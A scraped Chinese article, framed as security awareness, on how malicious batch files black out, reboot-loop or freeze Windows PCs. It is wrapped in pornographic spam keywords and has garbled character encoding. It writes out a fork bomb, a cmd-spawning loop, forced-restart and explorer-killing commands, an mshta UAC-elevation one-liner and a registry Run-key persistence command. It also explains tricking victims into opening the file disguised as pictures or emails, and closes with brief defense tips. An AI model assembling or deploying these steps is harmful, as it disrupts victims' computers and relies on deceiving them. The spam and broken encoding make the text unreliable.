亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        惡意批處理文件導(dǎo)致電腦黑屏、反復(fù)重啟、無響應(yīng)的原因分析及應(yīng)對思路

        2020-11-08 06:42:15欒春偉
        關(guān)鍵詞:批處理注冊表命令

        欒春偉

        電腦"黑屏"、“反復(fù)重啟”、”死機(jī)無響應(yīng)”,成因多種多樣,處理方法也各不相同。很多時(shí)候,是惡意計(jì)算機(jī)程序?qū)е?,這里做個(gè)分析,提供一種解決思路。

        一、有三條計(jì)算機(jī)命令,常被初級黑客用來制造小麻煩

        1、電腦屏幕變?nèi)?/p>

        taskkill -f -im explorer.exe

        作用,關(guān)閉windows的圖形桌面。

        2、在指定時(shí)間后,重新啟動電腦

        shutdown -r -f -t 10

        作用,在10秒鐘后,重新啟動windows電腦,強(qiáng)制執(zhí)行。把這個(gè)命令放入“開機(jī)啟動”中,可以實(shí)現(xiàn)開機(jī)后,反復(fù)重啟計(jì)算機(jī)的效果。推而廣之,也可以預(yù)定在某個(gè)約時(shí)間,執(zhí)行一系列的命令,不僅僅是重啟電腦,也可以備份重要數(shù)據(jù)到遠(yuǎn)程等等。

        3、把計(jì)算機(jī)資源耗盡,導(dǎo)致死機(jī)無響應(yīng)

        建立一個(gè)批處理文件中,輸入命令為

        %0|%0

        作用:批處理文件反復(fù)調(diào)用自己,每調(diào)用一次,占用一定資源,直到把計(jì)算機(jī)資源耗盡。

        此外,常見的方法還有:建立一個(gè)批處理文件中,輸入命令為

        :callCmdWindow

        start cmd.exe

        goto callCmdWindow

        其作用是利用批處理文件,不斷彈出CMD命令窗口,直到將計(jì)算機(jī)資源耗盡。與%0|%0的思路相通,方法不同而已。

        二、命令代碼如何被計(jì)算機(jī)自動執(zhí)行

        1、利用windows自啟動項(xiàng)

        windows注冊表Run鍵,是最易容想到的程序自啟動位置,讓電腦進(jìn)入widonws后,自動加載惡意代碼,只要把包含惡意代碼的文件,加入到Run即可。Run鍵有2個(gè)位置,分別是:

        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

        [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

        2、把批處理文件放到自啟動項(xiàng)里

        寫一個(gè)批處理文件。這個(gè)批處理文件的功能,不僅包括要執(zhí)行的“搗亂代碼”,還要包括,取得必要的程序執(zhí)行權(quán)限,修改注冊表,以及把自己加載到計(jì)算機(jī)的開機(jī)自動執(zhí)行程序名單里面等功能。

        (1)新建一個(gè)批處理文件,

        用windows自帶的記事本,新建一個(gè)批處理文件,例如,文件名是:我的批處理文件.cmd,windows中批處理文件后綴是 .bat或.cmd,后綴與具體windows 版本有關(guān)。

        (2)獲取windows系統(tǒng)管理員權(quán)限

        想要修改注冊表,比如RUN值等,都需要先拿到計(jì)算機(jī)的系統(tǒng)管理員權(quán)限,才能實(shí)施。在批處理文件中加入下列命令,取得管理員權(quán)限。

        %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0:","","runas",1)(window.close)&&exit

        (3)批處理文件將自身加入到windows自啟動項(xiàng)

        在取得管理員權(quán)限后,在批處理文件中,寫入下列代碼,完成在注冊表中,把批處理文件自身加入到開機(jī)啟動的清單里面。這樣,以后,每次電腦開機(jī),都后執(zhí)行這個(gè)批處理文件,也就是這個(gè)文件中的惡意代碼。

        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run" /v 我的批處理文件 /d "%~dp0我的批處理文件.cmd" /f

        (4)惡意代碼

        選本文第一部分介紹的3個(gè)方法之一,放 與(略)

        三、如何讓電腦用戶點(diǎn)擊這個(gè)批處理文件

        完成上面的工作,一個(gè)簡單的黑客程序就寫好了。如何讓別人來執(zhí)行這個(gè)黑客程序呢。這就要用到社會工程學(xué)了,說白了,就是如何去忽悠人,想辦法讓人點(diǎn)擊這個(gè)批處理文件,一點(diǎn)擊,就可以在受害人的電腦上執(zhí)行了。常見的就是,把這個(gè)文件偽裝成吸睛美圖、掃二維碼中獎、老板郵件的附件等等。

        四、如何防范

        此種惡意代碼很易容在內(nèi)網(wǎng)中制造麻煩,因?yàn)檫@種惡意程序是自己編制的,用的也是正常的命令,沒有進(jìn)入計(jì)算機(jī)防病毒軟件的病毒庫,反毒軟件也很發(fā)現(xiàn)和防范這種代碼。因此,了解一些計(jì)算機(jī)安全基本常識必要,不點(diǎn)擊來源不明的文件和鏈接,了解并查看自己計(jì)算機(jī)的啟動項(xiàng)內(nèi)容,會清理不必要的啟動項(xiàng),可以有效防范類似惡意代碼。

        五、結(jié)束語

        本文通過實(shí)例,簡明地介紹了計(jì)算機(jī)惡意程序制作及傳播的基本方法,有利于提高電腦用戶的網(wǎng)絡(luò)信息安全意識,提高防范黑客攻擊和計(jì)算機(jī)病毒入侵的能力,對網(wǎng)絡(luò)管理人員解決運(yùn)行中的問題,也有一定的幫助。

        猜你喜歡
        批處理注冊表命令
        只聽主人的命令
        移防命令下達(dá)后
        更上一層樓 用好注冊表編輯器
        這是人民的命令
        基于PSD-BPA的暫態(tài)穩(wěn)定控制批處理計(jì)算方法的實(shí)現(xiàn)
        藍(lán)色命令
        學(xué)習(xí)器揭開注冊表面紗
        移動一族(2009年3期)2009-05-12 03:14:30
        批處理天地.文件分類超輕松
        軟件不能運(yùn)行,注冊表中找根源
        批處理天地.批量為文件更名(續(xù))
        午夜无码熟熟妇丰满人妻| 亚洲精品无码久久久久牙蜜区| 欧美 国产 日产 韩国 在线| 4hu四虎永久在线观看| 欧洲色综合| 黑丝美女喷水在线观看| 日韩av一区二区观看| 亚洲热线99精品视频| 人妻 日韩精品 中文字幕| 成年奭片免费观看视频天天看| 日韩精品一区二区三区免费观影| 一区二区精品天堂亚洲av| 一本色道久久亚洲综合| 精品少妇人妻av无码专区| 亚州精品无码久久aV字幕| 国内精品久久人妻互换| 成年女人免费v片| 麻豆精品传媒一二三区| 婷婷激情六月| 一本久道视频无线视频试看| 亚洲av熟女少妇久久| 乱人伦中文无码视频在线观看 | 色婷婷综合中文久久一本| 色婷婷久久免费网站| av高潮一区二区三区| 亚洲乱亚洲乱妇无码麻豆| 国产亚洲日韩欧美一区二区三区| 国产又粗又猛又黄色呦呦| 亚洲最大在线视频一区二区| 国产高清av首播原创麻豆| 日本韩国一区二区三区| 中文字幕精品久久一区二区三区| 国产精品免费无遮挡无码永久视频| av天堂久久天堂av色综合| 人妻无码一区二区在线影院 | 激情综合欧美| 亚洲国产成人av第一二三区| 午夜视频在线瓜伦| 精品亚洲欧美无人区乱码| 中文字幕午夜AV福利片| 在线观看麻豆精品视频|